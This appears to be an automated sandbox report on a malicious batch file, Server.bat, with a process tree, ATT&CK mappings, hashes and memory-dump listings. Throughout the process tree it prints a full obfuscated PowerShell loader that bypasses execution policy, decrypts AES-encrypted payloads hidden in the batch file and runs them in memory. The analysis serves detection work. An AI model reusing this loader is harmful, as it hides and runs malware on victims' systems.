        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        12⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2568
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        10⤵
        
        PID:1580
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        11⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1596
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        9⤵
        
        PID:1976
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        10⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1108
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:876
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1172
        
        C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:572
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1740
      - C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2472
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1948
    - - C:\Windows\system32\cmd.exe
        
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1020
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1304
  - - C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:836
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2760
- - C:\Windows\system32\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2596
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2480
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Server.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3032
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FlQMat0MWKp9p4UULL++wi+e0BJHd+7kmep9YgwUMpw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('D8vzUdbK0uDuvMgXeJhQog=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BQyPQ=New-Object System.IO.MemoryStream(,$param_var); $mlacX=New-Object System.IO.MemoryStream; $MruNj=New-Object System.IO.Compression.GZipStream($BQyPQ, [IO.Compression.CompressionMode]::Decompress); $MruNj.CopyTo($mlacX); $MruNj.Dispose(); $BQyPQ.Dispose(); $mlacX.Dispose(); $mlacX.ToArray();}function execute_function($param_var,$param2_var){ $dayBD=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uVeDZ=$dayBD.EntryPoint; $uVeDZ.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Server.bat';$YxGQE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Server.bat').Split([Environment]::NewLine);foreach ($ZxnzT in $YxGQE) { if ($ZxnzT.StartsWith(':: ')) { $VoPBS=$ZxnzT.Substring(3); break; }}$payloads_var=[string[]]$VoPBS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2648

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Server.bat

Filesize
44KB

MD5
9b73da20750c3cfb67ed507fc1721782

SHA1
ecc787c9468e7a4fbcc4b69856f7a2ffa865bc3f

SHA256
5e714e32f9397868c6d2ce9fe26f8c3c99e336bfa694abfff3a3178d307127aa

SHA512
d2e5077b709d7061fd17092a3b3cc3b4306c37967048354e08fd2e0297c755946927449cf2305accf1e43c5003e2f8d75cebbcb09c084152e3a89955fbdd258c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
f8c7e4658d3061846c6949a58bd85317

SHA1
e2f59493223c5172a79aaed13c494bf82ed849c0

SHA256
73e892114685596226bdb08a59a321dac05ac76c462251e5e754fd457ca7ec84

SHA512
bc991a5695b42d0e20618b10e79511eb7ab0859f7c1981c8685cf73445d9f66d4e701084411380fed5ca267b20569d3ea991fd47b51cf980524e72e4f1c86184

Download Submit
memory/2140-0-0x000007FEF54A3000-0x000007FEF54A4000-memory.dmp

Filesize
4KB

Download
memory/2140-1-0x0000000000E00000-0x0000000000F24000-memory.dmp

Filesize
1.1MB

Download
memory/2140-11-0x000007FEF54A0000-0x000007FEF5E8C000-memory.dmp

Filesize
9.9MB

Download
memory/2204-12-0x000007FEF54A0000-0x000007FEF5E8C000-memory.dmp

Filesize
9.9MB

Download
memory/2204-28-0x000007FEF54A0000-0x000007FEF5E8C000-memory.dmp

Filesize
9.9MB

Download
memory/2480-34-0x000000001B880000-0x000000001BB62000-memory.dmp

Filesize
2.9MB

Download
memory/2480-35-0x0000000001E10000-0x0000000001E18000-memory.dmp

Filesize
32KB

Download
memory/2648-17-0x000000001B730000-0x000000001BA12000-memory.dmp

Filesize
2.9MB

Download
memory/2648-18-0x0000000001F40000-0x0000000001F48000-memory.dmp

Filesize
32KB

Download